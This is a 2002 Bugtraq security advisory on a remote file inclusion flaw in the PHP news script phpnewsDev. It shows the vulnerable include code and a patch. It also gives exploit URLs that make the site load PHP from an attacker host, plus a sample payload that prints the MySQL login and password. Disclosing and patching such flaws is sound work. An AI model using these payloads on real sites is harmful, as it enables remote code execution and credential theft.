[27567] in bugtraq
phpnewsDev
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Oct 22 19:45:48 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 22 Oct 2002 22:17:47 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F14hCo4lkCbYZLVMT43000095dd@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Language : PHP
Tested version : 1
Problem : bad use of include()
PHP Code :
°°°°°°°°°°
-------Include/variables.php3-------
<?
$Mac="localhost";
$Uti="root";
$Mot="";
$Bd="phpnews";
$AnneeDeDemarrage="2000";
$MoisDeDemarrage="8";
$NbNouvelles=5;
require("$Include/french.inc");
?>
-----------------------------------
and Include/lib.inc.php3 :
------------------------------------
include("$Include/config.inc.php3");
------------------------------------
Exploits :
°°°°°°°°°°
http://[target]/variables.php3?Include=http://[attacker]
with in the file http://[attacker]/french.inc :
<?
print("<center><u>MySQL Infos</u></center>\n\nServeur: $Mac \nLogin: $Uti
\nPass: $Mot \nDB Name: $Bd");
?>
and
http://[target]/Include/lib.inc.php3?http://[attacker]
with in a bad php code in the file :
http://[attacker]/config.inc.php3
Patch :
°°°°°°°
Add to the beginning of :
----------------------
Include/lib.inc.php3
Include/variables.php3
----------------------
the line :
$Include="Include";
More details in french :
http://www.frog-man.org/tutos/phpnewsDev.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpnewsDev.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
frog-m@n
_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
